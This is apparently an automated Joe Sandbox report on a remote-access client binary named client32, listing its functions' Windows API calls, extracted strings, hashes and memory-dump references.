• String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
• API String ID: 3451743168-2289091950
• Opcode ID: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
• Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
• Opcode Fuzzy Hash: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
• Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
APIs
  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
• GetDlgItem.USER32(00000000,00000001), ref: 1103944A
• EnableWindow.USER32(00000000,00000000), ref: 1103944F
• _calloc.LIBCMT ref: 1103945C
• GetSystemMenu.USER32(?,00000000), ref: 11039490
• EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103949E
• GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
• SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
• SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
• UpdateWindow.USER32(00000000), ref: 11039567
• BringWindowToTop.USER32(?), ref: 1103956E
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
  • Part of subcall function 1115FFC0: SetForegroundWindow.USER32(?), ref: 1115FFEE
• MessageBeep.USER32(000000FF), ref: 1103957F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
• String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
• API String ID: 4191401721-1182766118
• Opcode ID: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
• Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
• Opcode Fuzzy Hash: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
• Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759
APIs
• EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
• RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
• RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
• GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
• LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
• RegisterClassExA.USER32(?), ref: 110CB4F2
• _memset.LIBCMT ref: 110CB51B
• GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
• LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
• RegisterClassExA.USER32(?), ref: 110CB58C
• LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
• LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
  • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Similarity
• API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
• String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
• API String ID: 2220097787-1587594278
• Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
• Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
• Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
• Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
APIs
• GetSysColor.USER32(00000004), ref: 11003691
  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
  • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
• CreateSolidBrush.GDI32(00000000), ref: 110036A5
• GetStockObject.GDI32(00000007), ref: 110036B0
• SelectObject.GDI32(?,00000000), ref: 110036BB
• SelectObject.GDI32(?,?), ref: 110036CC
• GetSysColor.USER32(00000010), ref: 110036DC
• GetSysColor.USER32(00000010), ref: 110036F3
• GetSysColor.USER32(00000014), ref: 1100370A
• GetSysColor.USER32(00000014), ref: 11003721
• GetSysColor.USER32(00000014), ref: 1100373E
• GetSysColor.USER32(00000014), ref: 11003755
• GetSysColor.USER32(00000010), ref: 1100376C
• GetSysColor.USER32(00000010), ref: 11003783
• InflateRect.USER32(?,000000FE,000000FE), ref: 110037A0
• Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
• SelectObject.GDI32(?,?), ref: 110037CE
• SelectObject.GDI32(?,?), ref: 110037D8
• DeleteObject.GDI32(?), ref: 110037DE
Similarity
• API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
• String ID:
• API String ID: 3698065672-0
• Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
• Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
• Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
• Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1
APIs
• GetLocalTime.KERNEL32(?,FailedAttacks,00000001,FailedAttacks,00000000,80000002,Software\Productive Computer Insight\Client32,0002001F,00000000,00000000,?,?,?,1EF76653,?,?), ref: 1104B8F6
• _sprintf.LIBCMT ref: 1104B923
  • Part of subcall function 110ED9F0: RegSetValueExA.ADVAPI32(00000002,?,00000000,?,00000001,00000003,?,?,?,?,11112835,authcode,?,00000001,authcode,000F003F), ref: 110EDA19
• _strncpy.LIBCMT ref: 1104BACE
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Similarity
• API ID: ErrorExitLastLocalMessageProcessTimeValue_sprintf_strncpywsprintf
• String ID: @ %s$%04d/%02d/%02d %02d:%02d:%02d$%s, %d$*** Warning. Failed Attack %u, from %s, at %s$FailedAttacks$Info. Connection Rejected, reason=%d$IsA()$LastAttack$LastAttacker$NC-$Software\Productive Computer Insight\Client32$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
• API String ID: 3341947355-3231647555
• Opcode ID: c1a08ebd0c0cca2c53fd9c2065dee75976c60c6aa31f1c1f1af79d9370508339
• Instruction ID: fe029f2b4bd5101e4da145cc81d4ac0798fef8b5c75ba173e470820e68b704ff
• Opcode Fuzzy Hash: c1a08ebd0c0cca2c53fd9c2065dee75976c60c6aa31f1c1f1af79d9370508339
• Instruction Fuzzy Hash: 34916075E00219AFEB10CFA9CC84FEEFBB4EF45704F148199E549A7281EB716A44CB61
APIs
• _calloc.LIBCMT ref: 1104702F
• wsprintfA.USER32 ref: 110470AE
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
• wsprintfA.USER32 ref: 110470E9
• GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
• _strrchr.LIBCMT ref: 1104720C
• GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
• _free.LIBCMT ref: 11047251
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
• API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
• String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
• API String ID: 1757445300-1785190265
• Opcode ID: 24c3795b5edef53b19da24d8b2da5203a0cff33bf5a432e62935ac5c0fdc3eed
• Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
• Opcode Fuzzy Hash: 24c3795b5edef53b19da24d8b2da5203a0cff33bf5a432e62935ac5c0fdc3eed
• Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
APIs
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• _malloc.LIBCMT ref: 1100B496
  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
  • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,1EF76653,?,00000000,00000000), ref: 1100AD54
  • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
  • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
  • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
  • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
  • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
  • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
  • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
• EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,1EF76653,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
• CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
• _calloc.LIBCMT ref: 1100B519
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
• LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
• LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
Strings
• Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
• Vista new pAudioCap=%p, xrefs: 1100B603
• InitCaptureSounds NT6, xrefs: 1100B5BE
• Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
• DisableSounds, xrefs: 1100B472
• Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
• \\.\NSAudioFilter, xrefs: 1100B4E0
• Audio, xrefs: 1100B477
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Yara matches
Similarity
• API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
• String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
• API String ID: 1843377891-2362500394
• Opcode ID: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
• Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
• Opcode Fuzzy Hash: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
• Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
APIs
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
• GetLastError.KERNEL32(?), ref: 1102BA81
• GetLastError.KERNEL32(?), ref: 1102BADE
• _fgets.LIBCMT ref: 1102BB10
• _strtok.LIBCMT ref: 1102BB38
  • Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4
• _fgets.LIBCMT ref: 1102BB74
• _strtok.LIBCMT ref: 1102BB88
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Yara matches
Similarity
• API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
• String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
• API String ID: 78526175-1484737611
• Opcode ID: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
• Instruction ID: 5d6f4620134fd972b767ce717457c33aaf76edba5691a1b8f6aa8fc2ebdb03c0
• Opcode Fuzzy Hash: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
• Instruction Fuzzy Hash: EA81F876D00A2D9BDB21DB94DC80FEEF7B8AF04309F4404D9D919A3244EA71AB84CF91
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• LoadLibraryA.KERNEL32(wlanapi.dll,?,?,?,?,11058627), ref: 1115B61B
• GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 1115B634
• GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 1115B644
• GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 1115B654
• GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 1115B664
• GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 1115B674
• std::exception::exception.LIBCMT ref: 1115B68D
• __CxxThrowException@8.LIBCMT ref: 1115B6A2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                    • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                                                                                    • API String ID: 2439742961-1736626566
                                                                                                                                                    • Opcode ID: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                                                                                                    • Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
                                                                                                                                                    • Opcode Fuzzy Hash: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                                                                                                    • Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                                                                                      • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                                                                                      • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                                                                                      • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                                                                                      • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                                                                                                    • _free.LIBCMT ref: 1112131D
                                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                    • _free.LIBCMT ref: 11121333
                                                                                                                                                    • _free.LIBCMT ref: 11121348
                                                                                                                                                    • GdiFlush.GDI32(?,?,?,02E68E30), ref: 11121350
                                                                                                                                                    • _free.LIBCMT ref: 1112135D
                                                                                                                                                    • _free.LIBCMT ref: 11121371
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1112138D
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1112139A
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,02E68E30), ref: 111213A4
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 111213CB
                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 111213EB
                                                                                                                                                    • InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8
                                                                                                                                                    Strings
                                                                                                                                                    • Error deleting membm, e=%d, xrefs: 111213AB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                                                                                    • String ID: Error deleting membm, e=%d
                                                                                                                                                    • API String ID: 3195047866-709490903
                                                                                                                                                    • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                                                                                    • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                                                                                                    • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                                                                                    • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11053A8A
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                      • Part of subcall function 11041F40: inet_ntoa.WSOCK32(?,?,?,?,110539A4,00000000,?,?,1EF76653,?,?), ref: 11041F52
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountErrorExitLastMessageProcessTickinet_ntoawsprintf
                                                                                                                                                    • String ID: %s:%u$Announce Error from %s. Invalid crc - ignoring$Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x]$IsA()$ListenPort$NSMWControl32$NSSWControl32$NSTWControl32$Port$TCPIP$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$port
                                                                                                                                                    • API String ID: 3701541597-1781216912
                                                                                                                                                    • Opcode ID: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                                                                                                    • Instruction ID: 5c383da36f12d4855d2941ef62f3cc5b6d46123aa205a4bcc3d01b822d31dab0
                                                                                                                                                    • Opcode Fuzzy Hash: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                                                                                                    • Instruction Fuzzy Hash: 3AD1A278E0461AABDF84DF94DC91FEEF7B5EF85308F044159E816AB245EB30A904CB61
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                                                                                                    • CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
